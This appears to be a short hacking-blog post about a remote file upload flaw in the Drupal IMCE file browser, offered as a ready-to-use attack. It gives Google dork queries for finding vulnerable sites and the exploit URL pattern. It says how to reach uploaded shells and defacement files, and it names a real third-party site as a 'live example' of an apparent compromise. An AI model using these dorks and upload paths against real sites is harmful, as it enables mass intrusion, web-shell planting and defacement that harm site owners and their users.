Remote file upload vulnerbility | Durpal IMCE Mkdir remote File upload exploit

                               

This is a very simple remote file upload exploit on drupal in which you can upload defaces,jpgs,php,asp,shell.asp;me ..etcetc
Google Dorks : 

inurl:"/imce?dir=" 

intitle:"File Browser"

exploit :       

http://website.com/imce?dir= 

Shell Access : 

http://website.com/files/yourfilehere 

http://www.website.com/abc/files/abc/yourfilehere

live exapmle:

http://www.music-orality-roots.eu/sites/default/files/events/inrud3rdev_1.jpg

Posted in Website hacking